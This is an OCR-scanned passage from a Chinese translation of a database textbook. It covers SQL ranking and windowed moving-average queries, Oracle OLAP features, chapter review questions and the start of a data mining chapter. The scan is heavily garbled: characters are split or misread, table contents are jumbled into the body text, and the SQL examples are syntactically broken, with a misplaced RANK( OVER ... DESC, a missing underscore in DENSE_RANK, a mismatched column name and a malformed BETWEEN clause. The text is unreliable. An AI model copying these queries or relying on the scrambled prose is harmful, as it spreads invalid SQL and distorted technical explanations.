| 例 33.3 3》》 使 用 RANK 和 DENSE_RANK 函数 

为 Edinburgh 各 分 店 的 总 销售 额 排 序 。 

首先 计算 Edinburgh 每 个 分 店 的 房产 销售 总 量 ， 然 后 进行 排队 。 这 个 查询 要 访问 Branch 
和 PropertySale 两 个 表 。 我 们 通过 下 面 的 查询 展现 RANK 和 DENSE _RANK 的 差 弄 : 


SELECT branchNo, SUM(saleAmount) AS sales, 
RANK( OVER (ORDER BY SUM(saleAmount)) DESC AS ranking, 
DENSE RANK() OVER (ORDER BY SUM(saleAmount)) DESC AS dense_ranking 
FROM Branch, PropertySale 
WHERE Branch.branchNo = PropertySale.branchNo 
AND Branch.city = ‘Edinburgh’ 
GROUP BY(branchNo); 


结果 显示 在 表 33-5 中 。 
表 33-5 例 33.3 的 返回 结果 


<4 
加 窗 计算 


加 窗 计算 可 用 来 计算 累加 、 移 动 和 中 心 聚集 。 它 为 表 里 的 每 一 行 返回 一 个 值 ， 但 该 值 依 
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赖 于 对 应 窗口 内 的 其 他 行 。 例 如 ， 加 窗 计算 可 以 用 来 计算 累加 和 、 移 动 和 、 移 动 平 均值 、 移 
动 最 大 值 /最 小 值 ， 以 及 其 他 统计 量 。 这 些 聚 合 函 数 无 须 自 联 接 就 能 访问 同一 张 表 中 的 多 个 
行 ， 但 仅 能 用 在 查询 的 SELECT 和 ORDER BY 子 语 中 。 

下 例 展示 如 何 加 窗 用 于 求 移动 平均 及 移动 和 。 


| 例 33.4 从 使 用 加 窗 计 算 
计算 2013 年 上 半年 B003 分 店 每 个 月 的 房产 销售 额 以 及 每 三 个 月 的 移动 平均 值 和 移动 和 。 
首先 计算 出 2013 年 上 半年 B003 分 店 每 个 月 的 房产 销售 额 ， 然 后 用 它们 计算 每 三 个 
月 的 移动 平均 值 和 移动 和 。 也 就 是 计算 B003 分 店 当 月 和 前 两 个 月 的 房产 销售 额 的 移动 平 
均值 及 移动 和 。 这 个 查询 需要 访问 PropertySale 表 。 在 下 面 的 查询 中 ， 展 示 用 ROWS 2 
PRECEDING 函数 来 创建 三 个 月 的 移动 窗口 : 


SELECT yearMonth, SUM(saleAmount) AS monthlySales, AVG(SUM(saleAmount)) 
OVER (ORDER BY yearMonth, ROWS 2 PRECEDING) AS 3-month moving avg, 
SUM(SUM(salesAmount)) OVER (ORDER BY yearMonth ROWS 2 PRECEDING) 
AS 3-month moving sum 
FROM PropertySale 
WHERE branchNo = ‘B003’ 
AND yearMonth BETWEEN (2013-01 AND ‘2013-06’) 

GROUP BY yearMonth 

ORDER BY yearMonth; 


结果 见 表 33-6。 


表 33-6 例 33.4 的 结果 表 


有 ET 


注意 在 结果 表 中 ， 三 个 月 的 移动 平均 和 移动 和 的 前 两 行 间 隔 比 指定 的 要 小 ， 这 是 因为 加 
窗 计 算 无 法 达到 该 查询 检索 到 的 数据 之 前 的 数据 。 因 此 ， 必 须 考虑 在 结果 集 内 可 能 存在 不 同 
的 窗口 大 小 。 也 就 是 说 ， 为 了 得 到 我 们 确切 需要 的 结果 ， 可 能 需要 修改 查询 。 《《 

最 新 版 本 的 SQL 标准 ， 即 SQL:2011 大 量 关注 了 时 态 数据 库 领 域 ， 这 在 31.5 节 已 描述 
过 。 但 是 ， 还 有 一 些 新 的 非 时 态 特性 ， 特 别 有 一 个 有 益 于 那些 加 窗 分 析 。 这 个 新 功能 称 为 
“窗口 增强 ”, ISO/IEC 9075-2 (ISO，2011 ) 的 SQL/Foundation 中 给 出 ， 并 在 Zemke ( 2012) 
中 被 描述 和 说 明 。 新 增强 功能 包括 : 

e NTILE。 

e 在 窗口 中 导航 。 

e 窗口 函数 中 的 藤 套 导航 。 

e 分 组 选项 。 

Oracle 对 于 SQL 的 发 展 和 改进 起 着 非常 重要 的 作用 。 实 际 上 ，SQL:2011 的 OLAP 新 特 
性 中 的 许多 都 是 Oracle 自 版 本 8/8i 后 就 一 直 支 持 的 。 接 下 来 ， 我们 将 简要 介绍 Oraclellg 和 更 
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近 的 版 本 对 OLAP 的 支持 。 


33.6 Oracle OLAP 


在 大 型 数据 仓库 环境 中 ,会 出 现 多 种 不 同类 型 的 分 析 作 为 支持 商务 智能 平台 的 组 成 部 
分 。 用 户 除 了 传统 的 SQL 查询 ， 还 需要 对 数据 进行 更 加 高 级 的 分 析 操 作 。 主 要 的 两 类 分 析 
是 OLAP 和 数据 挖掘 。 本 节 描 述 Oracle 如 何 提供 OLAP 作为 Oracle 商务 智能 平台 的 一 个 重 
要 组 成 部 分 。 下 一 章 再 讨论 Oracle 如 何 支 持 数据 挖掘 。 


33.6.1 Oracle 的 OLAP 环境 


数据 仓库 的 价值 在 于 它 支 持 商 务 智能 的 能 力 。 迄 今 为 止 ， 标 准 的 报表 和 即席 查询 以 及 报 
表 程序 都 直接 运行 在 关系 表 上 ， 而 更 复杂 的 商务 智能 应 用 则 使 用 专用 的 分 析 数 据 库 。 专 用 的 
分 析 数 据 库 一 般 会 提供 复杂 的 多 维 计算 和 预测 函数 ， 然 而 ， 它 们 需要 将 大 量 数据 复制 到 专门 
数据 库 中 。 

将 数据 复制 到 专门 的 分 析 数 据 库 中 是 非常 昂贵 的 。 需 要 额外 的 硬件 来 运行 分 析 数 据 库 和 
存储 复制 的 数据 。 需 要 另外 的 数据 库 管理 员 来 管理 这 个 系统 。 复 制 过 程 常常 使 得 数据 在 分 析 
数据 库 中 真正 开始 分 析 的 时 间 严 重 滞后 于 它 在 数据 仓库 中 变 得 可 用 的 时 间 ， 数 据 复制 导致 的 
延迟 会 显著 影响 数据 的 价值 。 

Oracle OLAP 在 支持 商务 智能 时 ， 无 须 大 规模 复制 数据 到 专用 的 分 析 数 据 库 。Oracle 
OLAP 允许 应 用 直接 基于 数据 仓库 进行 复杂 的 多 维 计算 。 结 果 是 ， 单 个 数据 库 更 可 管理 、 更 
可 扩展 ， 支 持 最 大 数目 的 应 用 访问 。 

商务 智能 应 用 只 有 易于 访问 时 才 有 用 处 。 为 了 支持 更 大 规模 的 、 分 布 的 用 户 团体 访问 ， 
Oracle OLAP 面向 Internet 设计 。Oracle Java OLAP API 提供 一 个 现代 的 Internet 就 绪 API， 
让 应 用 开发 人 员 可 以 构建 Java 应 用 、applets、servlets 和 JSP， 并 且 它 们 能 使 用 各 种 各 样 的 
设备 ， 如 PC、 工 作 站 、Web 浏览 器 、PDA 和 支持 Web 的 移动 电话 来 进行 部 署 。 


33.6.2 ”商务 智能 应 用 平台 


Oracle 数据 库 为 商务 智能 应 用 提供 一 个 平台 ,该 平台 的 组 件 包括 Oracle 数据 库 和 在 
Oracle 数据 库 里 作为 一 个 设施 的 Oracle OLAP。 该 平台 主要 提供 : 

e 一 套 完整 的 分 析 函 数 ， 包 括 多 维和 预测 函数 。 

e 支持 快速 查询 响应 时 间 ， 比 如 那些 通常 与 专用 分 析 数 据 库 相关 联 的 。 

e 用 于 存储 和 分 析 T 比特 级 数据 集 的 可 伸缩 平台 。 

e 对 多 维和 基于 SQL 的 应 用 都 可 用 的 平台 。 

e 支持 基于 Internet 的 应 用 。 


33.6.3 _ Oracle 数据 库 


Oracle 数据 库 是 Oracle OLAP 的 基础 ， 它 为 Oracle OLAP 提供 了 可 扩展 和 安全 的 数据 
存储 、 汇 总 管理 、 元 数据 、SQL 分 析 函 数 和 高 可 用 性 特性 。 
为 了 比特 级 数据 仓库 提供 支持 的 可 伸缩 特性 包括 : 
e 分 区 特性 ， 它 允许 数据 仓库 中 的 对 象 被 分 割 成 更 小 的 物理 组 成 部 分 ， 这 些 部 分 可 以 
独立 地 并 行 地 被 管理 。 
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e 并 行 执行 查询 ， 它 允许 数据 库 使 用 多 个 进程 来 满足 单个 Java OLAPI API 查询 。 

e 支持 NUMA 和 集群 系统 ， 它 使 得 组 织 机 构 能 有 效 地 使 用 和 管理 大 型 硬件 系统 。 

e Oracle 数据 库 资源 管理 器 ， 它 通过 控制 每 种 类 型 的 用 户 允 许 使 用 的 资源 量 来 管理 大 

型 和 分 散 的 用 户 群 体 。 

安全 

数据 仓库 的 安全 很 重要 。 为 了 提供 尽 可 能 强 的 安全 支持 并 且 最 小 化 管理 开销 ， 所 有 安 
全 策略 都 必须 在 数据 仓库 中 强制 使 用 。 用 户 要 在 Oracle 数据 库 里 认证 ， 或 通过 数据 库 授 权 
或 通过 Oracle Internet Directory。 对 多 维 数据 模型 元 素 的 访问 也 受 Oracle 数据 库 中 的 授权 
和 特权 控制 。 对 单元 级 数据 的 访问 ， 在 Oracle 数据 库 中 用 Oracle 虚拟 私有 数据 库 ( Oracle’s 
Virtual Private Database) 特性 来 控制 。 

汇总 管理 

物化 视图 为 在 数据 仓库 中 管理 数据 提供 了 一 种 便利 的 手段 。 与 汇总 表 相 比 ， 物 化 视图 有 
诸多 优势 : 

e 对 应 用 和 用 户 透 明 。 

e 管理 数据 的 陈旧 性 。 

e 当 源 数据 发 生 改 变 时 ， 自 动 保持 更 新 。 

和 Oracle 的 普通 表 一 样 ， 物 化 视图 可 以 被 分 区 和 并 行 维护 。 但 是 与 专 有 的 多 维 立 方 体 
不 同 ， 物 化 视图 的 数据 允许 被 使 用 数据 仓库 的 所 有 应 用 访问 。 

元 数据 

Oracle 所 有 的 元 数据 都 存储 在 数据 库 中 。 低 级 对 象 如 维度 、 表 和 物化 视图 直接 定义 在 数 
据 字 典 里 ， 而 高 级 的 OLAP 对 象 定义 在 OLAP 目录 中 。OLAP 目录 包含 了 像 Cube 和 Measure 
folder 这 样 的 对 象 以 及 像 维 度 这 样 一些 其 他 对 象 的 扩展 定义 。OLAP 目录 完整 地 定义 了 维度 表 
和 事实 表 ， 因 此 完成 了 星 形 模式 的 定义 。 

SQL 分 析 函 数 

Oracle 引入 了 一 套 新 的 SQL 分 析 函 数 ， 具 有 了 SQL 的 分 析 处 理 能 力 。 这 些 分 析 函 数 包 
括 下 列 计算 能 力 : 

e 排队 和 百分比 。 

e 移动 窗口 计算 。 

e 滞后 /超前 分 析 。 

。 第 一 /最 后 分 析 。 

e 线形 回归 统计 。 

排队 函数 包括 计算 累积 分 布 、 百 分 比 排序 以 及 N-tile， 移 动 窗口 计算 给 出 移动 和 累积 聚 
集 ， 例 如 求 和 和 求 平 均 。 滞 后 /超前 分 析 能 直接 引用 内 部 的 行 以 支持 计算 同期 变化 。first/ 
last 分 析 一 组 排序 的 纪录 中 第 一 条 或 最 后 一 条 记录 。 线 形 回归 统计 函数 支持 对 一 系列 数值 对 
的 标准 最 小 二 乘 拟 合 。 这 既 能 用 于 聚集 函数 也 能 用 于 加 窗 计 算 和 报表 函数 。Oracle 支持 的 
SQL 分 析 函 数 简 要 地 分 类 描述 于 表 33-7。 

为 了 增加 性 能 ， 分 析 函 数 可 以 并 行 化 ， 即 多 个 进程 同时 执行 所 有 这 些 语句 。 这 样 的 能 力 
使 计算 更 简便 、 更 高 效 ， 从 而 提高 了 数据 库 的 性 能 、 可 伸缩 性 和 简洁 性 。 
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表 33-7 Oracle 的 SQL 分 析 函 数 


类 型 用 途 
排队 计算 结果 集中 值 的 排序 、 百 分 比 以 及 N-tile 
加 窗 计算 计算 移动 和 累积 聚集 ， 主 要 与 下 列 函 数 一 起 用 : SUM、AVG、MIN、MAX、COUNT、 


VARIANCE、STDDEV、FIRST VALUE、LAST_VALUE 以 及 一 些 新 统计 函数 
计算 份额 ， 例 如 市 场 份额 。 主 要 与 下 列 函 数 一 起 用 : SUM、AVG、MIN、MAX、 


报表 COUNT ( 带 / 不 带 DISTINCT)、VARIANCE、STDDEV、RATIO_TO_REPORT 以 及 
一 些 新 统计 函数 

滞后 /超前 从 了 距 当 前 行 指 定数 目的 行 中 找 值 

FIRST/LAST 分 析 一 组 排序 的 纪录 中 第 一 条 或 最 后 一 条 记录 

线形 回归 计算 线性 回归 分 析 和 其 他 统计 信息 (斜率 、 截 距 等 ) 

反 向 百分比 数据 集中 对 应 指定 百分比 的 值 

假设 排序 和 分 布 假设 插入 一 行 到 指定 数据 集 ， 它 的 排 位 和 百分比 

灾难 恢复 


Oracle 的 灾难 恢复 (disaster recovery) 功能 可 以 保护 数据 仓库 中 的 数据 ， 其 主要 机 制 包 括 : 
e Oracle Data Guard， 一 个 全 面 的 备用 数据 库 灾难 恢复 解决 方案 。 

e 重 做 日 志和 恢复 目录 。 

e 备份 和 恢复 操作 ， 且 已 完全 整合 到 Oracle 分 区 特性 里 。 

e 文 持 增 量 式 备份 和 恢复 。 


33.6.4 Oracle OLAP 


Oracle OLAP 作为 Oracle 数据 库 的 一 个 集成 部 分 ， 支持 多 维 计算 和 预测 功能 。Oracle 
OLAP 既 支 持 Oracle 关系 表 又 支持 分 析 型 工作 空间 (analytic workspace) (一 种 多 维 数据 类 
型 )。Oracle OLAP 的 主要 特性 包括 : 

能 支持 复杂 的 、 多 维 的 计算 。 

支持 预测 功能 ， 例 如 预报 、 建 模 、 非 累加 性 聚集 和 分 配 以 及 场景 管理 (what-if)。 
Java OLAP API。 

集成 的 OLAP 管理 。 

多 维 计算 让 用 户 可 以 跨 维 分 析 数 据 。 例 如 ， 用 户 可 能 会 查询 “基于 美元 销售 的 增长 ， 在 
滚动 的 6 个 月 时 间 间 隔 内 ， 排 名 前 10 位 的 顾客 ， 每 位 买 的 最 多 的 10 种 产品 是 什么 ”。 在 这 
个 查询 中 ， 顾 客 的 排序 中 藤 套 着 产品 的 排序 ， 跨 越 若干 时 间 段 和 一 个 虚拟 量 进行 数据 分 析 。 
这 类 查询 可 以 直接 在 关系 数据 库 中 处 理 。 

预测 功能 可 以 回答 这 样 一 些 用 户 问题 “这 家 公司 下 个 季度 能 赚 多 少 ?”， 或 者 “这 个 月 应 
该 生产 多 少 项 目 ?”。 预 测 功能 需要 用 到 Oracle OLAP DML， 在 一 种 被 称 为 分 析 型 工作 空间 
的 多 维 数据 类 型 上 实现 。 

Oracle OLAP 使 用 一 种 多 维 数据 模型 ， 人 允许 用 户 用 商业 术语 (什么 产品 ， 什 么 顾客 ， 哪 
段 时 期 ， 哪 些 事实 ) 表达 查询 。 这 种 多 维 模 型 包括 度量 、 立 方 体 、 维 度 、 级 别 、 层 次 体系 以 
及 属性 等 。 

Java OLAP API 

Oracle OLAP API 是 基于 Java 的 。 因 此 ， 它 是 面向 对 象 、 平 台 无 关 以 及 安全 的 API， 人 允许 
应 用 程序 开发 者 基于 它 开发 各 种 Java 应 用 、Java Applet、Java Servlet 以 及 JSP 等 ， 它 们 能 部 
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署 给 Internet 上 的 大 型 、 分 布 的 用 户 社 区 。Java OLAP API 的 主要 特性 包括 : 
e 封装 。 
e 支持 多 维 计算 。 
e 渐 增 式 查询 构建 。 
e 多 维 游标 。 


33.6.5 ”性 能 


Oracle 数据 库 回避 了 分 析 的 复杂 性 与 支持 大 型 数据 库 之 间 的 矛盾 。 对 于 小 数据 集 (此 时 
专用 的 分 析 数 据 库 一 般 都 是 Excel)，Oracle 提供 的 查询 性 能 可 以 和 专用 的 多 维 数据 库 媲 美 。 
当 数据 库 规模 变 大 ， 或 者 查询 需要 访问 更 多 的 数据 时 ，Oracle 将 继续 保持 优异 的 查询 性 能 ， 
而 专用 的 分 析 数 据 库 此 时 一 般 会 降低 性 能 。 
在 Oracle 里 ，SQL 为 多 维 数据 查询 和 Oracle 数据 库 作 了 专门 的 优化 ， 因 此 Oracle 的 性 
能 和 可 扩展 性 都 比较 好 。 能 访问 多 维 模型 中 数据 单元 对 于 提供 可 与 专用 分 析 数 据 库 媲美 的 查 
询 性 能 至 关 重 要 。Oracle 数据 库 为 提供 高 性 能 的 随机 单元 访问 和 多 维 查询 而 引入 的 新 特性 有 : 
e 位 图 连接 索引 ， 它 被 用 于 数据 仓库 中 ， 将 维度 表 和 事实 表 预 连接 ， 结 果 存 在 单一 的 
位 图 索引 表 中 。 

e 分 组 集 ， 它 使 Oracle 能 用 单个 select 语句 从 多 级 汇总 中 选择 数据 。 

e WITH 子 句 ， 它 使 Oracle 可 以 创建 临时 结果 ， 并 在 查询 中 使 用 这 些 结果 ， 而 不 必 创 
建 临 时 表 。 

e SQL OLAP 函数 ， 它 为 表达 许多 OLAP 功能 提供 了 更 加 简明 的 方法 。 

e 自动 存储 管理 特性 ， 它 为 存储 密集 型 任务 分 配 适 当 的 内 存 。 

e 增加 游标 共享 ， 它 当 有 相似 的 查询 已 经 运行 时 ， 避 免 了 再 编译 查询 的 必要 。 


33.6.6 ”系统 管理 


Oracle 企业 管理 器 ( OEM) 提供 了 一 个 集中 的 、 完 整 的 管理 工具 。OEM 允许 管理 员 对 
数据 库 进 行 全 面 监控 ,包括 Oracle OLAP。Oracle 企业 管理 器 提供 的 对 Oracle OLAP 的 管理 
服务 包括 : 

e 实例 、 会 话 和 配置 管理 。 

e 数据 建 模 。 

e 性 能 监控 。 

e 作业 调度 。 


33.6.7 ”系统 需求 


Oracle OLAP 被 安装 为 Oracle 数据 库 的 一 部 分 ， 没 有 额外 的 系统 需求 。Oracle OLAP 也 
可 以 安装 在 一 个 中 间 层 系统 中 ， 此 时 需要 128M 内 存 。 当 分 析 型 工作 空间 使 用 频繁 时 ， 最 好 
分 配 较 多 的 空间 。 实 际 用 于 分 析 型 工作 空间 的 内 存量 会 随 应 用 变化 。 


33.6.8 _ Oracle 11g 中 的 OLAP 特性 


Oracle OLAP 是 Oracle Database 11g 企业 版 的 一 个 可 选项 ， 它 使 用 那些 以 前 仅 在 专用 OLAP 
数据 库 中 才 有 的 机 制 ， 提 供 对 业务 运营 和 市 场 有 价值 的 观察 。 因 为 Oracle OLAP 完全 集成 到 关 
系数 据 库 ， 所 有 数据 和 元 数据 都 从 Oracle 数据 库 内 部 管理 和 存储 ， 提 供 卓 越 的 可 扩展 性 ， 强 


408  ” 淄 九 部 分 两 参 篆 能 


大 的 管理 环境 ， 与 工业 强度 的 可 用 性 和 安全 性 。Oracle OLAP 中 重要 的 新 特性 包括 立方 体 
(cube) 的 数据 库 管理 关系 视图 , SQL 优化 器 使 用 的 立方 体 扫描 行 源 以 及 立方 体 组 织 的 物化 视图 。 
有 关 Oracle OLAP 的 更 多 详细 信息 ， 请 访问 http://www.oracle.com。 


本 章 小 结 

e 联机 分 析 处 理 (Online Analytical Processing，OLAP ) 是 大 量 多 维 数据 的 动态 综合 、 分 析 和 合并 。 

e 在 很 多 不 同 功 能 域 都 能 找到 OLAP 的 应 用 (OLAP applications)， 包 括 预算 、 金 融 性 能 分 析 、 销 售 分 
析 和 预测 、 市 场 研究 分 析 以 及 市 场 / 顾客 分 段 。 

e OLAP 应 用 的 关键 特性 包括 数据 的 多 维 视图 ， 对 复杂 计算 的 支持 以 及 时 间 关 系 分 析 。 

e 在 OLAP 环境 中 ， 多 维 数据 表现 为 n 维 的 数据 立方 体 (n-dimensional data cube)。 数 据 立 方 体 的 一 
种 替换 表示 是 立方 体 的 格 (lattice of cuboid)。 

@ 数据 立方 体 的 常见 分 析 操 作 包括 上 卷 (roll-up)、 下 外 〈drill-down)、 切 片 〈slice) 和 切 块 (dice) 以 
及 旋转 (pivot) 。 

e E.F. Codd 提出 了 12 条 选择 OLAP 工具 的 准则 。 

e 根据 提供 数据 进行 分 析 处 理 的 数据 库 的 体系 结构 不 同 ，OLAP 工具 可 分 为 多 种 类 型 。 四 种 主要 的 OLAP 
工具 为 : 多 维 OLAP(MOLAP)、 关 系 型 OLAP(ROLAP)、 混 合 OLAP(HOLAP) 和 桌面 OLAP(DOLAP ) 。 

e SQL:2011 标准 支持 OLAP 功能 ， 对 分 组 功能 扩展 了 CUBE 和 ROLLLUP 函数 ， 还 扩充 了 一 些 基本 
操作 ， 如 移动 窗口 和 排队 函数 等 。 


思考 题 


33.1 讨论 联机 分 析 处 理 (OLAP) 的 含义 。 
33.2 ”讨论 数据 仓库 和 OLAP 的 关系 。 
33.3 简 述 OLAP 应 用 以 及 这 种 应 用 的 特性 。 
33.4 简 述 多 维 数据 的 特性 以 及 这 种 数据 的 表达 方式 。 
33.5 ”描述 Codd 的 OLAP 工具 准则 。 
33.6 描述 下 面 每 种 OLAP 工具 的 体系 机 构 、 特 点 和 相关 问题 : 
(a) MOLAP 
(b) ROLAP 
(c) HOLAP 
(d) DOLAP 
33.7 讨论 SQL 标准 中 的 ROLLUP 和 CUBE 函数 是 如 何 提 供 OLAP 功能 的 。 
33.8 讨论 SQL 标准 中 的 基本 操作 ， 如 移动 窗口 和 排队 函数 是 如 何 提供 OLAP 功能 的 。 


习题 

33.9 DreamHome 的 总 经 理 要 求 你 进行 调查 研究 并 给 出 该 机 构 应 用 OLAP 的 报告 。 该 报告 应 描述 使 用 
的 技术 体系 ， 并 与 传统 的 关系 DBMS 的 查询 和 报表 工具 进行 对 比 。 同 时 应 该 指出 实现 OLAP 的 
各 种 优势 和 不 足 ， 以 及 相关 的 一 些 问 题 。 报 告 关 于 对 DreamHome 应 用 OLAP 应 有 明确 的 结论 。 

33.10 ”考察 你 所 在 的 组 织 机 构 (例如 大 学 /学 院 或 者 工厂 ) 是 否 涉及 了 OLAP 技术 ， 如 果 是 , 该 OLAP 
工具 是 否 属 更 大 的 商务 智能 投资 的 一 部 分 。 如 果 可 能 ， 陈 述 一 下 对 OLAP 感 兴趣 的 原因 、 这 些 
工具 正如 何 被 使 用 ， 以 及 OLAP 的 前 景 是 否 被 认识 到 。 


| 第 34 章 


Database Systems: A Practical Approach to Design, Implementation, and Management, 6E 


数据 挖掘 





| 本 章 目标 
本 章 我 们 主要 学 习 : 
数据 挖掘 的 相关 概念 
数据 挖 据 操作 的 主要 特征 ， 包 括 预测 性 建 模 、 数 据 库 分 段 、 连 接 分 析 、 偏 离 检测 
数据 挖掘 操作 的 相关 技术 
数据 挖掘 的 步骤 
数据 挖掘 工具 的 重要 特征 
数据 挖掘 与 数据 仓库 的 关系 
Oracle 对 数据 挖掘 的 支持 


本 书 第 31 章 曾经 提 到 ， 随 着 数据 仓库 (更 常见 的 是 数据 市 场 ) 技术 的 广泛 普及 ， 用 户 
迫切 需要 能 提供 高 级 分 析 能 力 的 更 强 有 力 的 访问 工具 。 有 两 种 访问 工具 能 够 满足 这 一 需求 ， 
即 联机 分 析 处 理 ( Online Analytical Processing，OLAP) 和 数据 挖掘 。 前 一 章 对 OLAP 技术 
进行 了 讨论 ， 本 章 讨 论 数据 挖掘 技术 。 
| 本 章 结构 

34.1 节 介 绍 数 据 挖掘 的 概念 ， 并 列举 一 些 数 据 挖掘 应 用 的 典型 例子 。34.2 节 介 绍 数 据 挖 


据 操 作 的 基本 特征 和 相关 技术 。34.3 节 介 绍 数据 控 气 过程。34.4 节 描 述 数 据 挖 据 工 具 的 重要 
特征 。34.5 节 介绍 数据 挖掘 与 数据 仓库 的 关系 。 最 后 ,34.6 节 介绍 Oracle 如 何 支 持 数 据 挖 据 。 


34.1 数据 挖掘 简介 


简单 地 在 数据 仓库 存储 信息 并 不 能 满足 一 个 组 织 机 构 寻 求 的 利益 。 为 实现 数据 仓库 的 价 
值 ， 必 须 抽取 数据 仓库 中 隐 含 的 知识 。 然 而 ， 当 数据 仓库 中 保存 数据 的 数量 和 复杂 度 都 不 断 
增长 时 ， 仍 使 用 简单 的 查询 和 报告 工具 进行 商业 分 析 ， 试 图 获得 数据 的 走势 和 相互 关系 ， 虽 
说 不 是 不 可 能 ， 那 也 变 得 越 来 越 困 难 了 。 数 据 挖 掘 是 从 海量 数据 中 提取 数据 走势 和 模式 最 好 
的 方法 之 一 。 数 据 挖掘 能 从 数据 仓库 中 发 现 普通 的 查询 和 报表 工具 所 不 能 察觉 的 信息 。 

目前 对 数据 挖掘 有 多 种 定义 ， 从 广义 定义 为 是 一 种 使 用 户 可 以 访问 大 数量 数据 的 工具 到 
狭义 定义 为 是 在 数据 上 执行 统计 分 析 的 工具 和 应 用 。 本 章 采 用 Simoudis ( 1996 ) 提出 的 较 
被 关注 的 定义 。 


数据 挖掘 | 从 大 型 数据 库 中 提取 有 效 的 、 从 前 未 知 的 、 易 理解 的 、 有 依据 的 信息 ， 并 使 用 
这 些 信 息 做 出 重要 业务 决策 的 过 程 。 


数据 挖掘 主要 涉及 数据 分 析 和 软件 技术 的 使 用 ， 目 的 是 发 现 数据 集合 中 隐藏 的 、 未 期 户 
的 模式 和 数据 集 之 间 的 联系 。 数 据 挖掘 的 焦点 在 于 揭示 一 些 隐 藏 和 未 期 望 的 信息 ， 因 为 发 现 
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一 些 本 来 就 直观 的 联系 和 模式 并 没有 多 少 意义 。 考 察 数 据 的 基本 规则 和 特性 就 可 以 确定 这 些 
联系 和 模式 。 

数据 挖掘 分 析 一 般 倾 向 于 从 数据 整理 开始 ， 那 些 产生 最 准确 结果 的 技术 通常 都 需要 大 数 
据 量 才 可 以 提交 可 靠 的 结论 。 分 析 过 程 首 先 要 找 一 种 样本 数据 结构 的 最 优 表 示 ， 此 间 获 得 时 
间 知 识 。 在 假设 更 大 的 数据 集合 与 样本 数据 具有 类 似 结构 的 前 提 下 ， 已 获得 的 时 间 知 识 就 扩 
大 到 更 大 的 数据 集 上 。 

数据 挖掘 技术 将 会 给 那些 投入 巨 资 构建 数据 仓库 的 企业 带 来 很 大 的 收益 。 数 据 挖掘 技术 
已 在 工业 界 广泛 应 用 。 表 34-1 列 出 了 数据 挖掘 在 零售 / 市场、 银行 、 保 险 、 医 药 等 方面 的 


应 用 示例 。 


34.2 ”数据 挖掘 技术 
数据 挖掘 技术 主要 有 四 个 相关 的 操作 ， 包 括 


表 34-1 数据 挖掘 应 用 示例 


预测 性 建 模 (predictive modeling)、 数 据 库 分 段 零售 /市场 : 
( database segmentation)、 连 接 分 析 (link analysis)、 识别 顾客 的 购买 模式 
偏离 检测 ( deviation detection)。 尽 管 这 四 个 主要 操 发 现 顾客 人 口 统计 特征 方面 的 关联 
作 中 的 任何 一 个 都 可 以 用 来 实现 表 34-1 中 列 出 的 预测 对 邮寄 促销 活动 的 反应 
任意 一 种 业务 应 用 ， 但 在 业务 应 用 和 对 应 的 操作 间 市 场 交易 分 析 
还 是 有 一 些 公 认 的 关联 。 例 如 ， 可 以 使 用 数据 库 分 银行 : 
段 操作 来 实现 直接 的 市 场 策略 ， 而 孤立 点 检测 则 可 发 现 信用 卡 冒 用 模式 
识别 诚信 顾客 


以 使 用 四 种 操作 的 任意 一 种 来 实现 。 而 且 ， 如 果 和 采 
用 多 种 操作 进行 处 理 ， 许 多 应 用 会 获得 很 好 的 执行 


预测 可 能 更 换 信 用 卡 关 联 的 顾客 


效果 。 例 如 ， 对 顾客 归 类 的 一 般 方法 是 ， 先 对 数 “确定 不 同 大使 用 信用 卡 消 人 的 傅 总。 
据 库 进行 分 段 ， 再 在 这 些 分 段 上 使 用 预测 模型 。 2 
数据 控 气 技术 是 上 述 数据 挖 气 操 作 的 具体 实 。 一 全 
. :新 险种 的 顾客 
现 方法 。 然 而 ， 每 一 种 操作 都 有 其 优 缺点 。 因 此 ， 一 到 


数据 挖掘 工具 通常 提供 实现 某 项 技术 的 操作 选择 
功能 。 表 34-2 列 出 了 与 四 种 主要 的 数据 挖掘 操作 
相关 的 主要 技术 (Cabena 等 人 ，1997 )。 


分 析 病 人 行为 以 预测 手术 到 访 
识别 对 不 同 疾病 成 功 的 药物 治疗 


关于 数据 挖掘 技术 和 应 用 的 进一步 讨论 ， 有 兴趣 的 读者 可 参阅 Cabena 等 人 ( 1997 ) 。 
表 34-2 ”数据 挖掘 操作 和 相关 技术 


操 作 数据 挖掘 技术 

分 类 

预测 性 建 模 值 预测 
人 口 统计 学 簇 集 

数据 库 分 段 神 妈 线 集 
关联 发 现 

连接 分 析 序列 模式 发 现 
相似 时 间 序列 发 现 

偏离 检测 ds 


可 视 化 方法 
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34.2.1 预测 性 建 模 


预测 性 建 模 类 似 于 人 类 这 样 一 种 学 习 经 历 ， 即 通过 不 断 观 察 形 成 某 个 现象 的 重要 特 伍 的 
模型 。 这 个 方法 运用 了 “现实 世界 ”的 一 般 性 ， 以 及 将 新 数据 套 人 一 般 性 框架 的 能 力 。 预 测 
性 建 模 可 以 用 来 分 析 现 有 的 数据 库 以 发 现 该 数据 集 的 一 些 重要 特 人 (模型 )。 该 模型 使 用 监 
督学 习 ( supervised learning) 法 构建 ， 包 括 两 个 阶段 : 训练 和 测试 。 训 练 阶段 先 使 用 一 个 称 
为 训练 集 (training set) 的 历史 数据 大 样本 集 构 建 一 个 模型 ， 测 试 阶段 再 将 一 些 新 的 、 未 使 
用 过 的 数据 套用 到 这 个 模型 中 ， 从 而 判定 该 模型 的 精确 性 和 物理 性 能 特征 。 预 测 性 建 模 的 应 
用 包括 客户 关系 管理 、 信 用 认可 、 跨 区 域 销售 和 直接 行销 等 领域 。 预 测 性 建 模 有 两 种 相关 技 
术 : 分 类 (classification) 和 值 预测 (value prediction)， 这 主要 根据 要 预测 变量 的 性 质 来 区 分 。 

分 类 

分 类 主要 用 于 将 数据 库 中 的 每 一 条 记录 归于 某 一 预定 义 好 的 类 ， 预 定义 的 类 数量 有 限 。 
有 两 种 专门 的 分 类 方式 : 树 推 导 和 神经 推导 。 图 34-1 中 的 分 类 示例 使 用 了 树 推导 。 

该 例 对 目前 正在 租房 的 顾客 是 否 有 意向 购房 感 兴 趣 。 这 个 预测 模型 主要 由 两 个 变量 决 
定 : 顾客 租房 的 时 长 和 顾客 的 年 龄 。 决 策 树 以 一 种 直观 的 方式 表现 了 这 种 分 析 。 模 型 预测 租 
房 时 长 超过 两 年 且 年 龄 大 于 25 岁 的 顾客 最 有 兴趣 购房 。 图 34-2 使 用 了 与 图 34-1 相同 的 例 
子 ， 使 用 神经 推导 进行 分 类 。 





输入 隐蔽 处 理 层 输出 
图 34-2 使 用 神经 推导 进行 分 类 


在 这 种 情况 下 ， 使 用 神经 网 络 实现 数据 分 类 。 一 个 神经 网 络 包含 一 组 相互 联系 的 神经 元 ， 
